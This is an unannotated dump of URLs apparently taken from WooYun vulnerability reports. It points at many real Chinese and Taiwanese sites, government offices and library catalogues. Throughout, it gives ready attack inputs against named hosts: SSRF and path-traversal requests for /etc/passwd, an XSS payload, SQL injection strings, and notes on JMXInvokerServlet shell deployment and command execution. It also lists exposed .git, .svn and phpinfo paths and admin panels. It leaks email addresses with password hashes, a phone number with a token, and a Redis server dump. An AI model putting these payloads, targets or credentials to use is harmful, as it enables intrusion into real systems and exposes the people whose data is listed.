http://310kx.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.1688hub.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.xdhome.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://sostore.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27&PageSize=24 http://cnzdrc.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://qmhy.com.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://twcz.net//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://cqjnm.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://eyigo.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://yuanxingchina.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://shop98.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.51ganxian.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://teli-go.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.wymao.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://yz35.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.sbada.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.ztfmall.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.runqu.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.oftshop.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.komaes.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.wbuyers.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://demo.shopefx.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.qm3s.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.gonggongjiaoyu.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.100com.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://fulifei.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://baiai.me//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.nydao.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.qinta.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.bibimian.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://12skycolors.com.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.ccegw.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://yuanzhongfu.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.drake.net.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.htd2013.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.51860007.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.imeirongyuan.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://cq.diy023.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://youhuiyoudao.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.sanbugou.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://4007070666.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://longfengjiewang.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://eyecolor.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://xiaohema.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://168book.net/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://guoranhaoshi.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://yunhaipifa.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://auto-apex.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://mlgc90.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://suzonger.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://kawa999.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.quanquanle.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://seagou.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.nilaya.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://xt1986.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://cheku88.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://223.202.67.50:8080 www.office-home.com.cn上下载365激活助手并打开 http://www.office-home.com.cn/webservice/api.asmx http://www.infosea.com.cn/yonghu.html http://61.187.55.41:8090/opac/ckmarc.jsp?kzh=zyk0347383 http://tsjs.sdwm.cn:8000/opac/ckmarc.jsp?kzh=zyk0043454 http://60.171.185.69:8089/opac/ckmarc.jsp?kzh=zyk0046921 http://www.kflib.cn:8090/opac/ckmarc.jsp?kzh=zyk0000925 http://125.223.252.12:8089/opac/ckmarc.jsp?kzh=zyk0020576 http://218.75.178.63:8089/opac/ckmarc.jsp?kzh=zyk0035408 http://210.45.183.219/opac/ckmarc.jsp?kzh=zyk0126857 http://211.86.195.15:8086/opac/ckmarc.jsp?kzh=zyk0036020 http://59.51.114.198:8088/opac/ckmarc.jsp?kzh=zyk0026652 http://211.84.229.10:8089/opac/ckmarc.jsp?kzh=zyk9001223 http://**.**.**/manage/Login.asp_ http://admin.fotomore.com/login.php http://www.sz-cits.cn/ http://117.79.131.99:8080/.svn/entries http://m.sfbest.com/user/address/list/1 http://m.sfbest.com http://m.sfbest.com/user/address/list/1 http://wooyun.org/bugs/wooyun-2010-061369 http://www.fqxzfw.com.cn/ http://bs.wzzl.gov.cn:8888/ http://zwfw.bincheng.gov.cn/ http://xzfw.wjq.gov.cn/zwdt/ http://xz.yuanan.gov.cn/web/ http://www.goldlib.com.cn/list.asp?classid=22 data:tag=news&callno=&tag=news&subtag=subexpired&sub=%E6%A3%80%E7%B4%A2 http://210.26.83.207:8001/opac/ http://111.123.226.31:90/opac/ http://211.84.163.240:8080/opac/ http://114.242.187.29:8080/opac/ http://113.247.235.133:8081/opac/ http://library.cnuschool.org.cn:8080/opac/ http://xsxwkp.cjlu.edu.cn/ http://www.ilas.com.cn/ http://211.69.140.40/NTBookRetrAuth.aspx?Pin=J http://ilas.ynlib.cn/NTBookRetrAuth.aspx?Pin=P http://202.96.165.98//NTBookRetrAuth.aspx?Pin=J http://lib.wdu.edu.cn:8081/NTBookRetrAuth.aspx?Pin=P http://110.65.147.72/NTBookRetrAuth.aspx?Pin=J http://www.mzshbj.gov.cn http://www.septwolves.com/readme.txt http://www.septwolves.com/phpinfo.php http://tlsw.net:8077/login/login.html https://mos.meituan.com/ http://www.apsjournal.com/Web/Login.aspx# http://www.lcjsyx.com/Web/Login.aspx# http://sypft.cnmanu.net/Web/Login.aspx# http://www.jsnyxb.com/Web/Login.aspx# http://dxjykxn.cnmanu.cn/Web/Login.aspx# http://www.tjkyhr.com/hrtool/Default.aspx?PID=6 http://beijing.ahyylw.com/hrtool/Default.aspx?PID=6 http://nyb.shibufangcao.com/hrtool/Default.aspx?PID=6 http://www.e855.net/hrtool/Default.aspx?PID=6 http://v8.workyi.com//hrtool/Default.aspx?PID=6 http://www.e-engine.com.cn:8080/admin_bg/,访问就可以直接看到管理后台的结构。 http://fsxy.hbue.edu.cn/TenYears/ http://iir.circ.gov.cn/exam_apply.jsp http://ydxuexi.cnsuning.com/clp/redirectLogin.htm http://m.fotomore.com/member/piclist.php?fid=1 http://124.126.119.144/ http://player.hz.letv.com http://210.32.205.60/Code.aspx?id=0199018805 http://opac.qzjmc.edu.cn:8085/Code.aspx?id=0199018805 http://210.35.35.5:82/Code.aspx?id=0199018805 http://my.lib.zust.edu.cn/Code.aspx?id=0199018805 http://211.69.20.130:81/Code.aspx?id=0199018805 http://opac.hznu.edu.cn/Code.aspx?id=0199018805 www.paisi.edu.cn:85/Code.aspx?id=0199018805 http://124.160.90.204/Code.aspx?id=019901880 http://wooyun.org/bugs/wooyun-2010-091263 http://oa.shenmojiaoyu.com:7001/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://oa.akcq.com/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://www.ahjinzhai.gov.cn:7001/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://61.136.203.132:7001/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://oa.orionww.com:7001/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://58.221.210.116:7001/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://oa.zjcof.com.cn/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://oa.shenmojiaoyu.com:7001/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://ahoa.cn/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 www.bellavita.com.tw/eng/floor.php?f=6 http://www2.taipei-101.com.tw/NEWSV/news_in.aspx?News_Sn=71 http://122.96.62.194:6969/net/home_init.action http://122.96.62.194:6969/admin/adUser_login.action http://math.stu.edu.cn/staff/staff_detail.asp?id=15 http://wooyun.org/bugs/wooyun-2010-061369 http://www.fqxzfw.com.cn/ http://bs.wzzl.gov.cn:8888/ http://zwfw.bincheng.gov.cn/ http://xzfw.wjq.gov.cn/zwdt/ http://xz.yuanan.gov.cn/web/ http://www.wushang.com http://my.oppo.com/user/findme?callback=http%3A%2F%2Fmy.oppo.com%2Fuser http://www.tjkyhr.com/persondh/urgent.aspx?key= http://beijing.ahyylw.com/persondh/urgent.aspx?key= http://nyb.shibufangcao.com/persondh/urgent.aspx?key= http://www.e855.net/persondh/urgent.aspx?key= http://v8.workyi.com/persondh/urgent.aspx?key= http://www.tjkyhr.com/PersonDH/TuiJian.aspx?key= http://beijing.ahyylw.com/PersonDH/TuiJian.aspx?key= http://nyb.shibufangcao.com/PersonDH/TuiJian.aspx?key= http://www.e855.net/PersonDH/TuiJian.aspx?key= http://v8.workyi.com/PersonDH/TuiJian.aspx?key= http://58.52.202.124/NoticeDetail.aspx?type=notice&id=2385 http://www.xgxz.gov.cn/NoticeDetail.aspx?type=notice&id=2237 http://www.dwxzfu.cn/NoticeDetail.aspx?type=notice&id=2195 http://www.alzwfw.com/NoticeDetail.aspx?type=notice&id=2268 http://cbyj.hbncw.cn/Index/noticeDetail.aspx?type=1&id=5147 http://221.233.196.131/NoticeDetail.aspx?type=notice&id=2265 http://www.ymxz.gov.cn/NoticeDetail.aspx?type=notice&id=2167 http://square.elong.com/ http://222.223.229.50:8080/admin/login.aspx http://211.157.186.169:8011/admin/login.aspx http://221.214.164.198:1039//admin/login.aspx http://www.qwyxjx.com/admin/login.aspx http://www.zjkljjx.com/admin/login.aspx http://111.63.18.151:81/admin/login.aspx http://www.whshjx.com/admin/login.aspx http://110.249.129.242/admin/login.aspx http://www.xmjdjx.cn/admin/login.aspx http://www.zljx.net:8080/admin/login.aspx http://store.oppo.com/orders/150527142154531/show http://store.oppo.com http://www.jpreto.com/manager/global/sys_setting.aspx http://www.yuanyangex.com/manager/global/sys_setting.aspx http://mashuihong.sx1.80data.net/manager/global/sys_setting.aspx http://www.sijgo.com/manager/global/sys_setting.aspx http://www.lbiexp.com/manager/global/sys_setting.aspx http://test4.majexpress.com/manager/global/sys_setting.aspx http://www.ipost520.com/manager/global/sys_setting.aspx http://v.boqii.com/vetapi.php?UDID=123&url=file:///etc/passwd http://gz.ip66.com/admin.php http://www.100eshu.com/ScEbook_Admin/login.aspx http://www.astro.ncu.edu.tw/people/researcher_bio.php?id=1 http://www.astro.ncu.edu.tw/publication/all_publication_e.php?pubdate=1 http://www.astro.ncu.edu.tw/~PTF/index.php?page=../../../../../../../../../../../etc/passwd http://www.astro.ncu.edu.tw/publication/all_publication_e.php?pubdate=%3Cscript%3Ealert%28/1/%29%3C/script%3E http://**.**.**/was2/xmsga/jsp/module/user/user_login.jsp_ www.ga.xm.gov.cn:3388/was2/xmsga/ptluser.action cn:3388/was2/xm***** http://219.146.10.134/ http://www.tygh.gov.cn/tygh/tygh/list.action http://count.wowsai.com/webalizer/ http://jr.hc360.com(118.194.34.150) http://118.194.34.150 http://42.96.144.54/ https://61.155.182.85/index.php?r=user%2Findex http://www.iqiyi.com/u/api/user/update_user_info?nickname= http://210.51.195.44/uploadMonthly/20150527164501$c.asp http://211.71.233.63/21stlearn/ http://xxxx/21stlearn_sync/file_list2.jsp http://xxxx/21stlearn_sync/file_list2.jsp?dir=D:/LearningSoft/21stlearn/Webapps/upload/1/2015-05-26/65&sub_file=0 inurl:web/allnewsnr.asp?bianhao= http://www.gzysx.com/sx/web/web/web/allnewsnr.asp?bianhao=96 http://www.gzjwch.com/web/web/web/allnewsnr.asp?bianhao=649 http://182.151.215.126/web/web/web/allnewsnr.asp?bianhao=23 http://125.66.2.3/web/web/web/allnewsnr.asp?bianhao=435 http://125.67.64.236:6611/web/web/web/allnewsnr.asp?bianhao=1891 http://220.178.213.189/web/web/web/allnewsnr.asp?bianhao=89 http://www.nmgca.com.cn/login.action http://www.whcits.com/xianlu.aspx?id=07001536599&qu=%BB%AA%B6%AB http://www.xcsrd.gov.cn/login.jsp http://www.xcsgxj.gov.cn/login.jsp http://www.hhflcp.com/webadmin/ http://www.hhflcp.com/about.php?type=gywm http://www.hhflcp.com/about.php?type=gywm http://www.10010999.com/cms/login.jsp http://www.10010999.com/cms/login.jsp http://218.60.147.16/ http://www.fjforestry.gov.cn:38501/login.aspx http://www.fjforestry.gov.cn:38501/GovSystem/Stu_User_Manage.aspx?action=edit&infoid=4833(改相应的ID) http://about.3158.cn/jiaru/zhaopin/?id=XXX http://210.32.205.60/Periodical.aspx?ID=1200006245 http://124.160.90.204/Periodical.aspx?ID=1100003012 http://www.paisi.edu.cn:85/Periodical.aspx?ID=1100003012 http://211.69.20.130:81/Periodical.aspx?ID=1200006245 http://my.lib.zust.edu.cn/Periodical.aspx?ID=1200006245 http://115.231.0.41/Periodical.aspx?ID=1200006245 http://210.33.60.110/Periodical.aspx?ID=1200006245 http://www.zjkfda.gov.cn/detail5.asp?newsid=1371 http://111.113.17.195:7028/Kjbm/baoming/login.action http://www.ncszfcg.gov.cn:8002/login.aspx http://www.ncszfcg.gov.cn:8002/system/Stu_User_Manage.aspx?action=edit&InfoPager=1&infoid=1033 url:http://61.183.121.210:8380/invoker/JMXInvokerServlet http://202.115.133.173/StudentInfo/StuAcsBsInfoHandler.ashx?Action=ModifyPwd http://zxxs.gzsjyt.gov.cn/jsp/public/login.jsp http://222.240.176.21/ https://github.com/lionzixuanyuan/suning_json/blob/5574a36bb7543c390f21407e9c27254ff58e217b/lib/suning_json.rb http://plazamallsit.cnsuning.com:8080/api/get_member_info?phone=18626464667&token=asdasdasdasd http://plazamallsit.cnsuning.com:8080/api/get_member_info_by_card?vip_card=510202000025&token=asdasdasdasd http://plazamallsit.cnsuning.com:8080/api/bonus_adjustment http://plazamallsit.cnsuning.com:8080/api/get_member_redeem_row_count?vip_card=510202000025&token=asdasdasdasd http://plazamallsit.cnsuning.com:8080/api/get_member_gift_redeem?vip_card=510202000025&gift_id=21&token=asdasdasdasd http://plazamallsit.cnsuning.com:8080/api/get_all_gift?token=asdasdasdasd http://plazamallsit.cnsuning.com:8080/api/get_member_info_by_card?vip_card=510202000025&token=asdasdasdasd http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=file:///etc/passwd http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=file:///www/web/xiuxiu.web.meitu.com/plat/pic_proxy.php http://star.longzhu.com/520 http://star.longzhu.com/562319/Setting/Room http://zhanzhang.sm.cn/open/schema http://zhanzhang.sm.cn/open/XmlValidate http://www.njcky.com/news/detail.aspx?nid=59 http://www.njcky.com/njcky.rar http://www.njcky.com/Admin/Admin_Index.aspx http://119.90.53.178:9999/ redis_version:2.8.4 redis_git_sha1:00000000 redis_build_id:a44a05d76f06a5d9 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.8.2 process_id:28300 run_id:162ad9151062bf85375ffffe41fc2fc9d111c058 tcp_port:6379 uptime_in_seconds:7188735 lru_clock:667450 used_memory:15533496 used_memory_human:14.81M used_memory_rss:19869696 used_memory_peak:29648512 used_memory_peak_human:28.28M used_memory_lua:33792 mem_fragmentation_ratio:1.28 mem_allocator:jemalloc-3.4.1 rdb_last_save_time:1432737156 total_connections_received:9902 total_commands_processed:8795662 expired_keys:5470 keyspace_hits:612311 keyspace_misses:6500171 latest_fork_usec:594 role:master repl_backlog_size:1048576 used_cpu_sys:896.06 used_cpu_user:1366.81 used_cpu_sys_children:79.05 used_cpu_user_children:480.75 db0:keys=195,expires=172,avg_ttl=1083509001 http://stage.yunshanmeicai.com/ http://103.227.78.174:8080/ http://103.227.78.174:4001/ http://tieba.xx.ztgame.com/index.php?mod=bbs&kw=1*&page=10&act=list http://act.xx.ztgame.com/bbs/index.php?mod=bbs&act=list&kw=1* http://act.xzt.ztgame.com/lwj/index.php?mod=clan&act=zdlist&kw=1* http://chrb.tw/tenement.php?city_id=0&S1=8 http://rs.lenovo.net/index.php http://42.121.118.68:8080/login/Login_out.do http://42.62.39.206/wap/fl2/?mo=1&sortid=12&cm=M3140060&site=0 https://125.76.230.45/user/login https://125.76.230.44/user/login http://www.chinesetest.cn/kaoshenginfoStartbythemselves.do?bmid=11987*** http://pai.baidu.com/htdocs.tgz http://119.90.53.100/ http://119.90.53.180/ http://119.90.53.100/default/checklogin http://www.xjicpa.org.cn/login/login.do存在命令执行漏洞 f1da:9c96%13 http://crm.icbccs.com.cn/login.jsp http://crm.icbccs.com.cn/hsipccweb/random.jsp https://119.90.53.170/explore/projects http://www.kflib.cn:8089/ggjs/dzxx/dzxxxs.jsp?dztm=1&dzmm=3 http://211.84.229.10:8089/ggjs/dzxx/dzxxxs.jsp?dztm=1&dzmm=3 http://218.241.174.148:8070/ggjs/dzxx/dzxxxs.jsp?dztm=1&dzmm=3 http://211.86.195.15:8086/ggjs/dzxx/dzxxxs.jsp?dztm=1&dzmm=3 http://61.187.55.41:8090/ggjs/dzxx/dzxxxs.jsp?dztm=1&dzmm=3 http://tsjs.sdwm.cn:8000/ggjs/dzxx/dzxxxs.jsp?dztm=1&dzmm=3 http://beta.yunshanmeicai.com/ http://crm.yunshanmeicai.com/ http://ycg.qq.com http://mail.xunyou.com/ http://www.wetcode.com.cn/ http://www.ed12345.com:80/check.php http://www.tttc.com.cn/images/3389.aspx http://61.235.150.158/ http://61.235.150.158/showIndex.action http://kanwu.ccaonline.cn/atmm/listSearch.aspx?strTitleKey=123 http://www.i4.cn http://www.i4.cn/about.html#feedback http://www.bygzjy.cn/ http://www.gsggzyjy.cn/ http://www.plsggzyjy.cn/ http://121.40.131.71:8031/ http://www.jcggzy.com/ http://zyggzy.com/ http://ebs.chnzb.cn/ http://www.ctvap.cn/ui/Authenticate/SignIn.aspx http://118.85.207.153/invokering/JMXInvokerServlet部署war进行getshell http://118.85.207.153/is/index.jsp http://www.nsccsz.gov.cn/hpc/services/apply.aspx www.nsccsz.gov.cn http://218.192.12.50/report/ http://www.tagjj.com http://www.tagjj.com/admin/login.asp http://www.tagjj.com/11.rar https://125.76.228.15/ http://forum.wenming.cn/userPost.do?action=listThread&userName=admin http://forum.wenming.cn/userPost.do?action=listThread&userName=123456 http://forum.wenming.cn/userPost.do?action=listThread&userName=110112 http://forum.wenming.cn/userPost.do?action=listThread&userName=hackers提示找不到用户名 http://forum.wenming.cn/userPost.do?action=listThread&userName=root987提示没有这个用户名 https://125.76.235.29/vpn/index.php https://125.76.235.28/vpn/index.php https://125.76.235.22/vpn/index.php https://125.76.235.21/vpn/index.php http://union.gamebean.com/login.php http://www.h3c.com.cn/BizPortal/OnlineSurvey/ShowVedioImg.aspx?id=86354d9860ba40deacccfe0e36290e44 http://wooyun.org/bugs/wooyun-2010-093724 http://218.90.146.246:9090/common/codeMoreWidget.jsp?code=12 http://124.129.26.94:7742/common/codeMoreWidget.jsp?code=12 http://fe.hy-la.com:8088/common/codeMoreWidget.jsp?code=12 http://oa.suncorps.cn/common/codeMoreWidget.jsp?code=12 http://oa.chnjcdc.com:9090/common/codeMoreWidget.jsp?code=12 http://oa.shunhengli.com:9090/common/codeMoreWidget.jsp?code=12 http://ibmuniversity.csdn.net/m/zone/ibm/rockstack?search=%e6%90%9c%e7%b4%a2&technical=* http://www.eventalk.cn/ http://wx.csrcbank.com http://www.sanguomobile.com/download.php http://topic3.kugou.com/2014/qmg/ http://topic3.kugou.com/2014/qmg.zip http://www.agrij.com/) http://221.180.22.229:8080/finance/szgkb_form_wap.jsp?village_dm=0107034 http://218.87.99.80:8080/finance_jx05/szgkb_form_wap.jsp?village_dm=0101013 http://61.178.243.127:8081/finance_yc/szgkb_form_wap.jsp?village_dm=0107007 http://106.74.112.41:8081/finance_nxyc/szgkb_form_wap.jsp?village_dm=0108005 http://124.164.240.217:8082/finance45/szgkb_form_wap.jsp?village_dm=0105001 http://221.180.22.229:8080/finance/cmgkb_form_wap.jsp?village_dm=0108007 http://218.87.99.80:8080/finance_jx06/cmgkb_form_wap.jsp?village_dm=0101014 http://61.178.243.127:8081/finance_yc/cmgkb_form_wap.jsp?village_dm=0107012 http://106.74.112.41:8081/finance_nxyc/cmgkb_form_wap.jsp?village_dm=0101019 http://124.164.240.217:8082/finance45/cmgkb_form_wap.jsp?village_dm=0106010 http://221.180.22.229:8080/finance/ysgk_form_wap.jsp?village_dm=0107018 http://218.87.99.80:8080/finance_jx05/ysgk_form_wap.jsp?village_dm=0102004 http://61.178.243.127:8081/finance_yc/ysgk_form_wap.jsp?village_dm=0107026 http://116.255.142.23:8181/finance_xjtc/ysgk_form_wap.jsp?village_dm=0105014 http://106.74.112.41:8081/finance_nxyc/ysgk_form_wap.jsp?village_dm=0103005 http://221.180.22.229:8080/finance/resource_change_detail.jsp?village_dm=0101001 http://124.164.240.217:8080/finance03/resource_change_detail.jsp?village_dm=0105012 http://218.59.175.234:8080/finance03/resource_change_detail.jsp?village_dm=0103002 http://61.178.243.127:8081/finance_yc/resource_change_detail.jsp?village_dm=0110004 http://hcnl.gov.cn:8082/finance_hc/resource_change_detail.jsp?village_dm=0105002 http://ceo.300.cn/index.php/ceo8/score_adds?type=1 http://**.**.**/wsUDT/cdn/cdn.action_ http://www.net.cn/ https://**.**.**/Zone/index.html_ http://**.**.**/index.phpcontroller=CtTrafficf&action=Index_ https://**.**.**/_ http://60.29.110.41/ https://180.201.32.22/ http://222.143.9.1/ https://gugan.bzpt.edu.cn/ http://www.hanhoo.com/publish/system/badmin/ http://183.63.96.156:8084/editor/plugins/ http://183.63.96.156:8084/editor/plugins/baidumap/fake.aspx http://wapi.hexun.com/web.zip www.ourgame.com http://121.9.244.212:88/login.php http://221.203.76.30:8080/EPMS/initLoginBsAction.action http://222.76.242.219:8089/ http://222.76.242.219:8089/WebSite/bin里可以看到几个图片目录,显然系统与厦门交警有关 http://weigou.baidu.com/promo/ft315 https://61.155.49.26/ https://61.155.49.27/ https://61.155.49.28/ https://61.155.49.29/ https://61.155.82.2/ https://61.155.101.116/ https://61.155.110.85/ https://61.155.110.242/ https://61.155.210.98/ http://tejia.ku6.com/.git/config http://122.144.134.79/ispirit/go.php?LOGIN_UID= http://www.ccas.com.cn:8008/ispirit/go.php?LOGIN_UID= http://219.139.134.9:70/ispirit/go.php?LOGIN_UID= http://bjzljz.com/ispirit/go.php?LOGIN_UID= http://chc.eup.cn:88/ispirit/go.php?LOGIN_UID= http://183.129.186.82/IDPA/access/public/login/logout.html www.hqxzfw.gov.cn/news_show.asp?id=910 http://kh.gw.com.cn/.svn/entries http://poc.10086.cn/ http://112.33.0.176:4480/station/logoutAction_logout.action http://211.143.88.98:8000/admin/Rs_login.do http://www.whcits.com/xianlu.aspx?id=04001426757&qu=%B6%AB%C4%CF%D1%C7 http://www.whcits.com/showtupian.aspx?csid=152 http://vip.septwolves.com/manage/web/index.php?app_act=club/user/member/address&num=99999 http://wooyun.org/bugs/wooyun-2015-0101199 http://sl.zhuna.cn/login www.ga.xm.gov.cn:3388/was2/xmsga/jsp/module/user/user_login.jsp_ http://hb.qq.com/a/20150528/029991.htm http://huodong.dachuw.com/ http://game.ent.sina.com.cn/ent/game_open_time.php?game_id=1 http://game.ent.sina.com.cn/ent/game_open_time.php?game_id=1%20or%201=1 http://www.snatcm.gov.cn/dzzw_login.htm http://www.kflib.cn:8089/opac/qtjsjg.jsp http://211.84.229.10:8089/opac/qtjsjg.jsp http://218.241.174.148:8070/opac/qtjsjg.jsp http://211.86.195.15:8086/opac/qtjsjg.jsp http://61.187.55.41:8090/opac/qtjsjg.jsp http://tsjs.sdwm.cn:8000/opac/qtjsjg.jsp http://www.kflib.cn:8089/opac/index.jsp?page=index_qtjs.jsp&index=11 http://live.wasu.cn/.git/config ssh://git@stash1.wtvdev.com:7999/por/portal.git http://www.infosea.com.cn/yonghu.html http://124.207.106.138:8070/opac/dzxxxgjg.jsp http://218.241.174.148:8070/opac/dzxxxgjg.jsp http://58.133.216.9:8070/opac/dzxxxgjg.jsp http://111.207.101.74:8070/opac/dzxxxgjg.jsp http://58.132.57.4:8070/opac/dzxxxgjg.jsp http://218.75.178.63:8089/opac/dzxxxgjg.jsp http://think.lenovo.com.cn/service/warranty/newsearchWarranty.aspx http://mail.yxj.org.cn/ http://c.lagou.com/childrenday/description.html?utm_source=AD__weixin&utm_medium=cxydnxs&utm_campaign=ertongjie#rd http://dealer.auto.sohu.com/bat69210/index.html http://dealer.auto.sohu.com/ http://dealer.auto.sohu.com/bat69210/index.html http://xl.5184.com/Degree/master/memberUserLoginAction.do?method=login&userName=569964936@qq.com&password=b47c41a544ede250423c772636c4da15 http://xl.5184.com/Degree/master/memberUserLoginAction.do?method=login&userName=136291439@qq.com&password=9ab688ee6be17403e4b1ef43e4bf200e http://xl.5184.com/Degree/master/memberUserLoginAction.do?method=login&userName=1522532155@qq.com&password=16175989d44096c5f41207b10160dfd7 http://xl.5184.com/Degree/master/memberUserLoginAction.do?method=login&userName=liuning19072@qq.com&password=50ebc2f6e13a2705e9b5c43de48f73ec http://123.127.67.55:8080/admin/main.action;jsessionid=AC29C49AAA408F7EC63FF6EB61E5714C存在命令执行漏洞 http://yixin.myctu.cn/Home/SignIn?ReturnUrl=/ http://proxy.resource.myctu.cn/ http://gateway.myctu.cn/ http://www.1633.com/ www.1633.com www.1633.com https://ebank.yaccb.cn/pweb/prelogin.do?_locale=zh_CN&BankId=9903&LoginType=C http://www.tudou.com/uis/sub/sub.action?jsoncallback=test&subId=765758835&type=2&app=watch&deviceID=1&url=&from=15&uid=769734551 http://oa.ynbit.com https://ebank.lzccb.cn/pweb/prelogin.do?_locale=zh_CN&BankId=9902&LoginType=C https://pan.chexiang.com/ http://101.227.68.174 http://101.227.68.142 http://w.wyschina.com/ https://14.18.235.229直接跳转到 http://pay.8684.com/ http://197.mojichina.com/ http://58.83.201.134/ http://docs.bilibili.cn/ http://docs.bilibili.cn/api.php?action=opensearch&search= 